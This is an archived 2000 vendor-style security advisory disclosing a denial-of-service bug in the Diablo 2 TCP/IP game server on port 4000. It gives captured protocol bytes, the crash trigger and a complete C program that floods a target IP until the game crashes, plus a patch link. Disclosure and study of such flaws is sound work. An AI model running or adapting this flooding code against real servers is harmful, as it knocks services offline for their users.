spad02.txt

spad02.txt: Posted Aug 24, 2000; Site secpoint.com; Security Point Advisories #2 - Diablo 2 TCP/IP Server has a DOS vulnerability that allows anyone who can connect on port 4000 to crash the game. Vulnerable versions: Diablo 2 1.0, 1.01, 1.02, 1.03. Fix available here.; tags | denial of service, tcp; SHA-256 | b26f84a0c7361a7edf0e302f395e9b83e79ad0422df53972120ed1b86a2807b6; Download | Favorite | View

spad02.txt

      Security Point
    info@secpoint.com
 http://www.secpoint.com/

Advisory #002
Title: Diablo 2 TCP/IP Sever DoS
Date: 21-08-00


      Copyright (c) 2000 SECURITY POINT

Contents:
=========

  I  Disclaimer
  II  Introduction
  III  Description
        IV      Demonstration code
  V  Fix
  VI  Contact
        VII     Job Offers
  VIII    Greetings

I - Disclaimer:
===============

This paper is for educational purpose only, Security Point will not be
responsible for any damages whatsoever that have a connection with the
information written in this paper. There are no warranties with regard
to this information, any use of this information is at the user's own risk.

II - Introduction:
==================

We have found a vulnerability in Diablo 2 TCP/IP Server running on port 4000.
If some malformed data is being send to port 4000 while running it will result 
in the game crashing. Though windows will NOT crash with it.

III - Description:
==================

While playing around with Diablo2 on port 4000, I discovered some 
problems with the TCP/IP Server. When a TCP/IP game in D2 was running, and 
connected to port 4000, then sent some info, it came with a "Diablo II Server 
Error".
Anyway, this bug turned out to be irregular.

So i began to explore the D2 TCP/IP Server some more. Then while listing on
port 4000 with a program, and trying to create a game, I discovered that D2
sends the following data, to the port if its occupied:

RAW:
>`
>f‚?g
>eÿ§
>
>
>eÿ§
>
>
>eÿ§
>
>lûJM
>eª§
>è#+ê:Í»ÞùJM
ASCII codes:
>96-0-169-5-24-121-169-5-216-9-0-0-7-2-0-0-176-1-3-0-0-71-114-89-112-72-111-78-45-68-75-0-0-0-0-0-52-0-0-4-0-0-0-0-0
>102-135-234-40-0-0-0-0-0
>101-255-167-3-0-0-85-170-85-170-71-0-0-0-71-114-89-112-72-111-78-45-68-75-0-0-0-0-0-0-0-0-0-0-221-0-16-0-130-0-3-0-1-0-255-255-255-255-255-48-255-27-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-0-255-0-255-0-255-0-255-0-255-0-255-0-255-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0
>0-0-0-0-0-104-110-69-50-87-111-111-33-6-0-0-0-42-1-1-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0
>0-0-0-0-0-0-0-12
>101-255-167-3-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0
>0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-87-83-1-0-0-0-80-0-2-1-1-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-2-1-1-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-2-1-1-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0
>0-0-0-0-0-1-119-12
>101-255-167-3-0-0-52-0-4-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-103-102-207-127-0-25-0-0-0-15-0-0-0-20-0-0-0-25-0-0-0-0-55-0-0-0-55-0-0-0-15-0-0-0-15-0-0-0-89-0-0-0-89-0-0-1-0-0-0-101-1-0-0-77-0-0-0-105-102-0-0-0-0-0-0-0-0-0-0-0-0
>0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-74-77-10-0-74-77-16-0-2-0-0-1-160-149-4-0-0-0-0-0-0-40-201-109-188-122-114-254-176-249-7-74-77-16-0-2-0-0-1-160-149-4-0-0-0-0-2-0-200-27-143-165-24-197-31-154-251-7-74-77-16-0-2-0-0-1-160-149-4-0-0-0-0-4-0-104-110-176-142-186-23-65-131-249-7-74-77-16-0-2-0-0-1-160-149-4-0-0-0-0-6-0-8-193-209-119-88-106-98
>108-251-7-74-77-16-0-12
>101-170-167-3-0-0-2-0-0-1-0-18-4-0-0-0-0-210-0-168-19-243-96-250-188-131-85-1-0-74-77-16-0-2-0-0-1-16-18-4-0-0-0-0-146-0-72-102-20-74-152-15-165-62-3-0-74-77-16-0-0-0-0-1-32-17-4-0-0-0-0-82-0-40-92-197-216-93-127-50-249-4-0-74-77-16-0-0-0-8-1-80-77-4-0-0-12-24-0-0-112-127-12-188-99-44-157-92-248-7-74-77-16-0-2-0-4-1-144-65-4-0-0-46-48-0-0
>232-35-43-234-58-205-187-222-249-7-74-77-16-0-2-0-5-1-80-76-4-0-0-24-24-0-0-136-118-76-211-216-31-221-199-251-7-74-77-0-0-74-77-0-0-0-0-0-0-74

(without the ">"'s, ascii code separated by "-")

Maybe this can be some sort of shutdown message, that D2 sends if the server
wasn't shut down properly? In this data there where 3 eÿ§'s, so I started
testing how the D2 TCP/IP Server would respond if I sent some of them. At
first there wasn't much respond from the server, but if i sendt:

eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§\n

some (5-10) times in a row, it would come with the following message:

---------------------------------------------------------------------------
- Diablo II Server Error                                                -X-
---------------------------------------------------------------------------
-  /\   Assertion Failure                                                 -
- /  \  Location: C:\D2\Source\Fog\Src\QServer\Qserver98.cpp, line #272   -
-/____\ Expression: nSize >= 0 && nSize < READ_BUFFER_SIZE                -
-                            ---------------                              -
-                            -     OK      -                              -
-                            ---------------                              -
---------------------------------------------------------------------------

When you click OK it would crash diablo2. Then I tried with much more
eÿ§'s, that resolved in that i only had to send something 1 time. If I
tried with a lot of eg. A's then it wouldn't crash, but if I tried with one
of the other "commands" then it would also respond with the error.

IV - Demonstration code
=======================
/*
 * SPD2-DoS.c
 *
 * SECURITY POINT -- http://www.secpoint.com
 *
 * (C) COPYRIGHT SECURITY POINT 2000
 * All Rights Reserved
 *
 * This source code is for educational purpose ONLY, Security Point will not 
 * be responsible for any damages whatsoever that have a connection with this 
 * code. There are no warranties with regard to this information.  
 *
 * USE AT YOUR OWN RISK, BY USING THIS PROGRAM YOU ACCEPT ALL

 * RESPONSIBILITY FOR THE RESULTS

 *
 * For questions and suggestions email info@secpoint.com
 *
 * gcc SPD2-DoS.c -o SPD2-DoS
 *
 *
*/


#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netdb.h>
#include <string.h>


#define OFFSET 10000

struct in_addr addr;
struct sockaddr_in address;
int d2_socket;
char sendbuffer[OFFSET];

main (int argc, char *argv[]) {
  printf("Diablo 2 TCP/IP Server DoS, by http://www.secpoint.com\n");
  if (argc != 2) {
    printf("Usage: %s ip\n", argv[0]);
    exit(0);
  }
  if ((d2_socket = socket(AF_INET, SOCK_STREAM,0)) < 0) {
    perror("socket");
    exit(0);
  }
  address.sin_family=AF_INET;
  address.sin_addr.s_addr = inet_addr(argv[1]);
  address.sin_port = htons(4000);
  if (connect(d2_socket, (struct sockaddr*)&address, sizeof(address)) < 0) {
    perror("connect");
    exit(0);
  }
  memset(sendbuffer, 0x60, sizeof(sendbuffer));
  while(1) {
  write(d2_socket, sendbuffer, strlen(sendbuffer));
  }
  close(d2_socket);
  printf("server killed\n");
}

V - Fix:
========
Vulnerable versions: Diablo 2 1.0, 1.01, 1.02, 1.03
Download the new patch from blizzard.com:
(http://www.blizzard.com/support/diablo2/information/patch.shtml)

VI - Contact:
=============

If you have further questions regarding this bug, then you can contact us at
www.secpoint.com
info@secpoint.com

VII - Job Offers:
=================
We are looking for people for: 
Penetration testing of Firewalls and TCP/IP based networks.
You must have a wide knowledge of TCP/IP protocols and applications, plus solid
technical experience of UNIX or Windows NT. 
The best candidate will have security experience in one or more of the 
following: 

ú Penetration testing. 
ú Linux and other network operating systems .
ú Web technologies: HTML, XML, JavaScript, Java, php, and asp.
ú Firewall, VPN and intrusion detection integration.
ú Product Certs and other forms of education.
ú Routers, hubs, switches.


Finally, successful candidates must have the ability to take on responsibility
and work unsupervised in our offices and on customer sites. They must also be 
able to communicate their findings to client staff via written reports and 
presentations. 
Another important factor is that you have a CLEAN criminal record.

Send your CV to info@secpoint.com (in MS Word, PDF or plain text formats)

http://www.secpoint.com


VIII - Greetings:
=================
: SecurityFocus.com, ADM

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

spad02.txt

spad02.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

spad02.txt

Share This

spad02.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems